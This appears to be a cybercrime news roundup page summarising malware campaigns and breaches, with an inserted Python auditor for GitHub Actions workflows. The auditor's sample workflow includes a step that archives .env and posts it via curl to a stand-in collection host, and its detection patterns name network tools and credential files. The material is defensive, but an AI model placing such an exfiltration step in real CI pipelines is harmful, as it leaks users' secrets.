Cybercrime
-
Six Android malware families steal data and hijack payments, researchers find
Researchers found six Android malware families that steal data and enable financial fraud. The trojans use fake Play Store listings, accessibility-service abuse and screen overlays to hijack transfers, including real-time attacks on Brazil's Pix instant payment system.
-
UNC6426 used stolen npm keys to gain AWS administrator access in under 72 hours
UNC6426 leveraged keys from an August 2025 nx npm supply chain compromise to obtain a GitHub token and escalate to AWS administrator permissions in under 72 hours, leading to S3 data exfiltration and production resource destruction.
-
Five malicious Rust crates exfiltrated .env files and AI bot exploited GitHub Actions
Researchers found five malicious Rust crates on crates.io that exfiltrated .env files. The packages have since been removed. Users should rotate any secrets that were present in affected environments, audit CI workflows and restrict outbound access from build systems to reduce supply chain risk.
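The "audit CI workflows" advice above is concrete enough to script. The following is an added example, not code from the page or from the researchers who reported the crates: a small regex-based auditor that flags GitHub Actions steps referencing third-party actions without a full commit SHA pin, and run steps that invoke outbound network tools or touch credential files such as .env. The sample workflow is constructed for illustration; the patterns are a starting point, not a complete policy, and the scanner is line-based rather than a YAML parser.

```python
import re

# Constructed sample workflow, not taken from the page or from any real repository:
# one SHA-pinned action, one action pinned only to a floating tag, and a run step that
# archives .env and posts it to an external host.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608
      - uses: some-org/setup-helper@v2
      - name: Build
        run: cargo build --release
      - name: Upload
        run: |
          tar czf env.tgz .env
          curl -s -X POST --data-binary @env.tgz https://example.invalid/collect
"""

# A full 40-hex commit SHA is the only action ref that cannot be moved under you later.
SHA_PIN = re.compile(r"@[0-9a-f]{40}$")
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*(\S+)", re.MULTILINE)
RUN_LINE = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")
# Tools that move data off the runner; a build step rarely needs them.
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest)\b")
# Files that typically hold credentials and should never be touched by a build step.
SECRET_FILE = re.compile(r"(\.env\b|\.npmrc\b|id_rsa\b|credentials\b)")


def run_steps(text: str):
    """Yield the shell body of every run: step, joining YAML block scalars (| or >)."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        if not m:
            i += 1
            continue
        indent, body = len(m.group(1)), m.group(2).strip()
        i += 1
        if body in ("|", "|-", ">", ">-"):
            block = []
            # A block scalar continues while lines are blank or indented deeper than 'run:'.
            while i < len(lines) and (
                not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent
            ):
                block.append(lines[i].strip())
                i += 1
            body = "\n".join(block)
        yield body


def audit_workflow(text: str) -> list:
    """Return human-readable findings for unpinned actions and suspicious run steps."""
    findings = []
    for m in USES_LINE.finditer(text):
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue  # local actions and container images are out of scope for SHA pinning
        if not SHA_PIN.search(ref):
            findings.append(f"unpinned action: {ref}")
    for body in run_steps(text):
        net = NET_TOOL.search(body)
        if net:
            findings.append(f"outbound network tool in run step: {net.group(1)}")
        sec = SECRET_FILE.search(body)
        if sec:
            findings.append(f"secret file referenced in run step: {sec.group(1)}")
    return findings


if __name__ == "__main__":
    for finding in audit_workflow(SAMPLE_WORKFLOW):
        print(finding)
```

Run it against every file under .github/workflows/ and treat any finding as a review item; pinning to a SHA and blocking egress from runners are the two controls that would have blunted the .env exfiltration the page describes.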
-
BlackSanta EDR killer used in year-long campaign targeting HR departments
A Russian-speaking actor ran a year-long campaign against HR departments deploying BlackSanta, an EDR killer that uses DLL sideloading and vulnerable drivers (bring-your-own-vulnerable-driver) to gain kernel-level access and disable endpoint protections.
-
KadNap botnet infects over 14,000 routers using peer-to-peer DHT to hide command infrastructure
KadNap, a router malware first seen in August 2025, has infected over 14,000 devices and uses a Kademlia DHT peer-to-peer network to hide its command infrastructure, leaving no fixed C2 server to block or seize, and to provide anonymized proxy services.
-
APT28 uses BEARDSHELL and COVENANT to surveil Ukrainian military
ESET documented APT28's use of BEARDSHELL and COVENANT to surveil the Ukrainian military since April 2024. The implants use cloud storage for command and control and show links to earlier APT28 tooling.
-
Dutch advisory links Russian actors to Signal and WhatsApp account hijacking campaign
A Dutch AIVD advisory links Russian state-sponsored actors to phishing that hijacks Signal and WhatsApp accounts of officials and journalists. Attacks use fake support chatbots and malicious QR codes to seize or link devices and monitor messages.
-
Ericsson US discloses data breach after service provider hack
Ericsson Inc. notified individuals that attackers stole employee and customer data after a service provider was hacked. The provider detected the incident in April 2025. Texas breach filings list 4,377 affected individuals.
-
Malicious npm package posing as OpenClaw installer deploys RAT, steals credentials
A JFrog technical analysis reported a malicious npm package posing as an OpenClaw installer. Uploaded March 3, 2026, the package installs a remote access trojan (RAT) and steals credentials, browser data, cryptocurrency wallets and other sensitive macOS data.